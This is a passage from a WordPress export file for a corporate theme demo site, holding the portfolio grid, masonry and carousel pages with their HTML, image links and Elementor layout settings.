border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Grid</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-grid/</link>
		<pubDate>Fri, 11 Sep 2020 07:25:08 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=847</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-15'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-16'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-17'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-19'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-20'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1-1200x1200.jpg 1200w, https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project2-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project2-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project2-1-1200x1200.jpg 1200w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-3-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-4-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-4-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-6-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/strategy/">strategy</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/">
				<img width="600" height="600" src="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project-5-1-150x150.jpg 150w" sizes="(max-width: 600px) 100vw, 600px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/">Fund Management</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/startup/">startup</a></p> 
			Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>847</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:25:08]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:25:08]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-grid]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"0238f9e","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"513ab33","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"e2dfe3b","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"5d7a201","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"position":"","filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]},"overlay_background":"#55BB5399"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;s:12:"stitle_color";i:1;s:29:"stitle_typography_font_weight";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:1:{s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:21:"overlay_style_section";a:2:{s:8:"position";i:1;s:18:"overlay_background";i:1;}s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Masonry</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-masonry/</link>
		<pubDate>Fri, 11 Sep 2020 07:45:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=858</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
	        		<ul>
	        				        			 	<li><a href="#" data-filter="*">All</a></li>
	        					                		                    <li>
								<a href='#' data-filter='.category-15'>business</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-16'>finance</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-17'>marketing</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-19'>startup</a>
							</li>	                    
		                		                    <li>
								<a href='#' data-filter='.category-20'>strategy</a>
							</li>	                    
		                					</ul>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/">
				<img width="1420" height="1420" src="https://maxbizz.s3.amazonaws.com/images/project1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project1.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project1-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project1-1-1024x1024.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project1-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project1-1-768x768.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project1-1-600x600.jpg 600w, https://maxbizz.s3.amazonaws.com/images/project1-1-1200x1200.jpg 1200w" sizes="(max-width: 1420px) 100vw, 1420px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/">
				<img width="1420" height="1630" src="https://maxbizz.s3.amazonaws.com/images/project2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project2.jpg 1420w, https://maxbizz.s3.amazonaws.com/images/project2-1-261x300.jpg 261w, https://maxbizz.s3.amazonaws.com/images/project2-1-892x1024.jpg 892w, https://maxbizz.s3.amazonaws.com/images/project2-1-768x882.jpg 768w, https://maxbizz.s3.amazonaws.com/images/project2-1-1338x1536.jpg 1338w" sizes="(max-width: 1420px) 100vw, 1420px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/">Finance Strategy</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">
				<img width="719" height="719" src="https://maxbizz.s3.amazonaws.com/images/project-3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-3.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-3-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-3-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-3-1-600x600.jpg 600w" sizes="(max-width: 719px) 100vw, 719px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/digital-marketing/">Digital Marketing</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/">
				<img width="719" height="797" src="https://maxbizz.s3.amazonaws.com/images/project-4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-4.jpg 719w, https://maxbizz.s3.amazonaws.com/images/project-4-1-271x300.jpg 271w" sizes="(max-width: 719px) 100vw, 719px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/enterprise-loan/">Enterprise Loan</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/marketing/">marketing</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/">
				<img width="605" height="605" src="https://maxbizz.s3.amazonaws.com/images/project-6.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-6.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-6-1-300x300.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-6-1-150x150.jpg 150w, https://maxbizz.s3.amazonaws.com/images/project-6-1-600x600.jpg 600w" sizes="(max-width: 605px) 100vw, 605px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/data-analytics/">Data Analytics</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/startup/">startup</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/strategy/">strategy</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/">
				<img width="605" height="736" src="https://maxbizz.s3.amazonaws.com/images/project-5.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-5.jpg 605w, https://maxbizz.s3.amazonaws.com/images/project-5-1-247x300.jpg 247w" sizes="(max-width: 605px) 100vw, 605px" />			</a>
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/"></a>
				<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/"></a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/fund-management/">Fund Management</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/startup/">startup</a></p> 
			Load More]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>858</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:45:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:45:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-masonry]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[774]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"26ace0b","elType":"section","settings":{"padding":{"unit":"px","top":"95","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"eee344b","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"df7a7a2","elType":"widget","settings":{"sub":"our portfolio","title":"Our Latest Case Studies","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]},"stitle_color":"#95A2AC","stitle_typography_font_weight":"600"},"elements":[],"widgetType":"iheading"},{"id":"32a1880","elType":"widget","settings":{"all_text":"All","load_more":"Load More","loading_more":"Loading...","style":"p-masonry","w_gaps_mobile":{"unit":"px","size":15,"sizes":[]},"filter_typography_typography":"custom","filter_typography_font_size_mobile":{"unit":"px","size":13,"sizes":[]},"overlay_background":"#55BB5399"},"elements":[],"widgetType":"ipfilter"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:4:{s:8:"iheading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:5;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:1;s:5:"title";i:1;s:11:"header_size";i:1;s:5:"align";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:7:{s:9:"stitle_bg";i:1;s:27:"title_typography_typography";i:1;s:33:"title_typography_font_size_mobile";i:1;s:28:"stitle_typography_typography";i:1;s:27:"stitle_typography_font_size";i:1;s:12:"stitle_color";i:1;s:29:"stitle_typography_font_weight";i:1;}}}}s:8:"ipfilter";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:5:"style";i:1;s:13:"w_gaps_mobile";i:1;}}s:5:"style";a:2:{s:20:"filter_style_section";a:2:{s:28:"filter_typography_typography";i:1;s:34:"filter_typography_font_size_mobile";i:1;}s:21:"overlay_style_section";a:1:{s:18:"overlay_background";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:1;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:1:{s:12:"_inline_size";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:1;s:14:"padding_mobile";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Carousel</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-carousel/</link>
		<pubDate>Fri, 11 Sep 2020 07:47:04 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=861</guid>
		<description></description>
		<content:encoded><![CDATA[our portfolio	        <h3>Our Latest Case Studies</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/">
								<img src="https://maxbizz.s3.amazonaws.com/images/project-slide-1.jpg" alt="" width="970" height="580">
							</a>
				<h5><a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/business-consultation/">Business Consultation</a></h5>
				<p> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/business/">business</a> / <a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio-cat/finance/">finance</a></p> 
			<a href="http://wpdemo.archiwp.com/maxbizz-corporate/portfolio/finance-strategy/">
